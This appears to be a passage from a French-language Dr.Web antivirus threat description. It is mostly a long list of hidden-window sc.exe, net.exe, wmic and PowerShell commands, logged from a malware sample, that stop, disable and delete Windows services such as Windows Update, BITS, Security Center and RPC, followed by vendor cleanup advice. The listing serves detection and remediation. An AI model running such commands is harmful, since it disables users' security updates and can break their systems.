  • '<SYSTEM32>\sc.exe' delete WMPNetworkSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WMPNetworkSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WMPNetworkSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WMPNetworkSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WMPNetworkSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WMPNetworkSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WMPNetworkSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop RemoteRegistry' (with hidden window)
  • '<SYSTEM32>\sc.exe' config RemoteRegistry start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete RemoteRegistry' (with hidden window)
  • '<SYSTEM32>\net.exe' stop RemoteRegistry /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RemoteRegistry' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RemoteRegistry' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'RemoteRegistry' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'RemoteRegistry' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'RemoteRegistry'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop wscsvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config wscsvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete wscsvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop wscsvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wscsvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wscsvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'wscsvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'wscsvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'wscsvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WinHttpAutoProxySvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WinHttpAutoProxySvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WinHttpAutoProxySvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WinHttpAutoProxySvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinHttpAutoProxySvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinHttpAutoProxySvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinHttpAutoProxySvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinHttpAutoProxySvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinHttpAutoProxySvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop BITS' (with hidden window)
  • '<SYSTEM32>\sc.exe' config BITS start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete BITS' (with hidden window)
  • '<SYSTEM32>\net.exe' stop BITS /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='BITS' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='BITS' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'BITS' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'BITS' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'BITS'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop wuauserv' (with hidden window)
  • '<SYSTEM32>\sc.exe' config wuauserv start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete wuauserv' (with hidden window)
  • '<SYSTEM32>\net.exe' stop wuauserv /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wuauserv' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='wuauserv' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'wuauserv' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'wuauserv' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'wuauserv'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop MSiSCSI' (with hidden window)
  • '<SYSTEM32>\sc.exe' config MSiSCSI start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete MSiSCSI' (with hidden window)
  • '<SYSTEM32>\net.exe' stop MSiSCSI /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSiSCSI' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSiSCSI' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MSiSCSI' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MSiSCSI' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MSiSCSI'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop StorSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config StorSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete StorSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop StorSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='StorSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='StorSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'StorSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'StorSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'StorSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop DPS' (with hidden window)
  • '<SYSTEM32>\sc.exe' config DPS start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete DPS' (with hidden window)
  • '<SYSTEM32>\net.exe' stop DPS /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DPS' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='DPS' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'DPS' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'DPS' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'DPS'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WdiServiceHost' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WdiServiceHost start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WdiServiceHost' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WdiServiceHost /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiServiceHost' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiServiceHost' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdiServiceHost' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdiServiceHost' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdiServiceHost'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WdiSystemHost' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WdiSystemHost start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WdiSystemHost' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WdiSystemHost /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiSystemHost' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WdiSystemHost' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WdiSystemHost' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WdiSystemHost' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WdiSystemHost'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WpnService' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WpnService start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WpnService' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WpnService /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WpnService' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WpnService' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WpnService' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WpnService' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WpnService'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop PcaSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config PcaSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete PcaSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop PcaSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='PcaSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='PcaSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'PcaSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'PcaSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'PcaSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop SysMain' (with hidden window)
  • '<SYSTEM32>\sc.exe' config SysMain start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete SysMain' (with hidden window)
  • '<SYSTEM32>\net.exe' stop SysMain /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SysMain' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='SysMain' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'SysMain' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'SysMain' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'SysMain'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WSearch' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WSearch start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WSearch' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WSearch /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WSearch' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WSearch' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WSearch' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WSearch' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WSearch'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WbioSrvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WbioSrvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WbioSrvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WbioSrvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WbioSrvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WbioSrvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WbioSrvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WbioSrvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WbioSrvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WlanSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WlanSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WlanSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WlanSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WlanSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WlanSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WlanSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WlanSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WlanSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WwanSvc' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WwanSvc start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WwanSvc' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WwanSvc /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WwanSvc' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WwanSvc' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WwanSvc' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WwanSvc' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WwanSvc'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop WinRM' (with hidden window)
  • '<SYSTEM32>\sc.exe' config WinRM start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete WinRM' (with hidden window)
  • '<SYSTEM32>\net.exe' stop WinRM /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinRM' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='WinRM' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'WinRM' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'WinRM' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'WinRM'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop W3SVC' (with hidden window)
  • '<SYSTEM32>\sc.exe' config W3SVC start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete W3SVC' (with hidden window)
  • '<SYSTEM32>\net.exe' stop W3SVC /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='W3SVC' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='W3SVC' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'W3SVC' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'W3SVC' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'W3SVC'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop IISADMIN' (with hidden window)
  • '<SYSTEM32>\sc.exe' config IISADMIN start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete IISADMIN' (with hidden window)
  • '<SYSTEM32>\net.exe' stop IISADMIN /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='IISADMIN' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='IISADMIN' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'IISADMIN' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'IISADMIN' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'IISADMIN'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop MSMQ' (with hidden window)
  • '<SYSTEM32>\sc.exe' config MSMQ start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete MSMQ' (with hidden window)
  • '<SYSTEM32>\net.exe' stop MSMQ /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSMQ' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='MSMQ' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'MSMQ' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'MSMQ' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'MSMQ'"' (with hidden window)
  • '<SYSTEM32>\sc.exe' stop RpcEptMapper' (with hidden window)
  • '<SYSTEM32>\sc.exe' config RpcEptMapper start= disabled' (with hidden window)
  • '<SYSTEM32>\sc.exe' delete RpcEptMapper' (with hidden window)
  • '<SYSTEM32>\net.exe' stop RpcEptMapper /y' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RpcEptMapper' call stopservice' (with hidden window)
  • '<SYSTEM32>\wbem\wmic.exe' service where name='RpcEptMapper' delete' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Stop-Service -Name 'RpcEptMapper' -Force"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-Service -Name 'RpcEptMapper' -StartupType Disabled"' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Remove-Service -Name 'RpcEptMapper'"' (with hidden window)

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.
Version démo gratuite

 

Télécharger Dr.Web

Par le numéro de série

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Version démo gratuite

 

Télécharger Dr.Web sur le site

Par le numéro de série

Télécharger Dr.Web sur l'Apple Store

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Version démo gratuite

 

Télécharger Dr.Web

Par le numéro de série

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android

Free trial

14 days

Download now
Get it on Google Play